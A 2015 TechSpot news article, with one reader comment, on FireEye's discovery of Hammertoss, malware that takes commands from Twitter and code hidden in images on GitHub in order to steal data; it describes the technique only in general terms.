1. TechSpot is dedicated to computer enthusiasts and power users. Ask a question and give support. Join the community here.
    TechSpot is dedicated to computer enthusiasts and power users.
    Ask a question and give support.
    Join the community here, it only takes a minute.
    Dismiss Notice

Hammertoss malware uses Twitter, GitHub to assemble itself

By Shawn Knight
Jul 30, 2015
Post New Reply
  1. Security firm FireEye has uncovered a piece of malware that may be much harder than usual to detect. It’s called Hammertoss and according to the company, it’s likely being used by a state-sponsored hacking group with Russian ties.

    As a general rule of thumb, security programs look for unusual behavior – a piece of malware or a virus in action, for example – as a first line of defense. If something is “off,” it’ll throw up a red flag and the security program will dig deeper to find the issue.

    Hammertoss, however, is designed to go undetected because it mimics a system’s user – you.

    Upon successful infection, Hammertoss turns to Twitter, scanning for messages from specific users to tell it what to do next. From there, it heads over to GitHub where it grabs an image laced with code that provides its next step. Once it has essentially assembled itself, it begins uploading data from the target computer to a cloud server where the masterminds can access it.

    FireEye says they haven’t seen this level of sophistication before.

    As you might expect, Hammertoss has thus far only targeted a few very high-value targets. Hackers with the skills needed to create it wouldn’t bother swiping photos or credit card data from random citizens; it’s just too complicated and likely too expensive to use for that.

    Or as FireEye threat researcher Jordan Berry notes, they use it sparingly so that it remains effective.

    As word about it spreads, however, cybercriminals may well pick it up.

    Permalink to story.

  2. jobeard

    jobeard TS Ambassador Posts: 9,939   +737

    Ouch; This algorithm is a nightmare:
    • access object-A, even a possible signed-verified object-A
    • access another object-B ... signed or otherwise
    • object-A & object-B can be perfectly safe web objects (eg JPGs)
    • yet parse(object-A) + parse(object-B) => virus payload in memory
    Just proves the point that the weakest link in security is the user+browser :(

Similar Topics

Add New Comment

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...